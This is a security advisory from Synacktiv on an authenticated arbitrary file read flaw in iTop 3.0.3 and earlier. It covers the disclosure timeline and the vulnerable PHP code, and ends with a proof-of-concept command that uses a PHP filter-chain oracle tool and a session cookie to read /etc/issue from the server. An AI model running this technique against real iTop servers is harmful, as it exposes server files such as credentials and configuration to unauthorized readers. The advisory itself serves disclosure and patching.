File read in iTop

15/04/2024 - Téléchargement





Fixed Version(s)

3.0.4, 3.1.1

Affected Version(s)

≤ 3.0.3

CVE Number



Jérôme Mampianinazakason



iTop is an application used for ticketing purposes and device management. It offers several levels of privileges, from simple users allowed to create tickets, to application administrators able to configure the application, manage users or devices.


Synacktiv discovered a file read vulnerability in the iTop project due to missing validation of user-provided input. It is exploitable only from an authenticated user on the application's backend.


Date Description
2023.07.10 Advisory sent to
2023.07.19 Vulnerabilities acknowledged done
2023.11.28 Release of version 3.1.1
2024.01.17 Release of version 3.0.4
2024.04.15 Public release


Technical details


The vulnerability resides in a call to the file_get_contents() function on a user-supplied parameter without prior verification.

The AJAX operation dashboard_editor allows any authenticated user on the backoffice to supply a file argument. This file is then transferred to the static method RuntimeDashboard::GetDashboardToEdit() in order to load a dashboard from a file, as showed in the following extract of the pages/ajax.render.php file line 1048:

case 'dashboard_editor':
    $sId = utils::ReadParam('id', '', false, 'context_param');
    $sDashboardFile = utils::ReadParam('file', '', false, 'string');
    $sReloadURL = utils::ReadParam('reload_url', '', false, utils::ENUM_SANITIZATION_FILTER_URL);
    $oDashboard = RuntimeDashboard::GetDashboardToEdit($sDashboardFile, $sId);
    if (!is_null($oDashboard)) {
        if (!empty($sReloadURL)) {
        $oDashboard->RenderEditor($oPage, $aExtraParams);



No sufficient check is performed in this method before reading the file's content.

    public static function GetDashboardToEdit($sDashboardFile, $sDashBoardId)
        $bCustomized = false;
        // Search for an eventual user defined dashboard
        $oUDSearch = new DBObjectSearch('UserDashboard');
        $oUDSearch->AddCondition('user_id', UserRights::GetUserId(), '=');
        $oUDSearch->AddCondition('menu_code', $sDashBoardId, '=');
        $oUDSet = new DBObjectSet($oUDSearch);
        // if id is in the database, read from it
        if ($oUDSet->Count() > 0) {
            // Assuming there is at most one couple {user, menu}!
            $oUserDashboard = $oUDSet->Fetch();
            $sDashboardDefinition = $oUserDashboard->Get('contents');
            $bCustomized = true;
        } else {
            // Else read from file
            $sDashboardDefinition = @file_get_contents($sDashboardFile);

        // init dashbard from the content

If the provided sDashBoardId does not exist, the user-supplied file is then used in the file_get_contents() call.



Using this vulnerability and the php_filter_chains_oracle_exploit tool, it is possible to read arbitrary files on the remote server.

$ python3 --target http://localhost/pages/ajax.render.php --headers '{"Cookie":"itop-bf***6g"}' --data '{"operation":"dashboard_editor", "id":"999999999"}' --parameter file --file /etc/issue
[*] Additionnal data used : {"operation":"dashboard_editor", "id":"999999999"}
[*] Additionnal headers used : {"Cookie":"itop-bf***6g"}
[+] File /etc/issue leak is finished!
Debian GNU/Linux 11 \n \l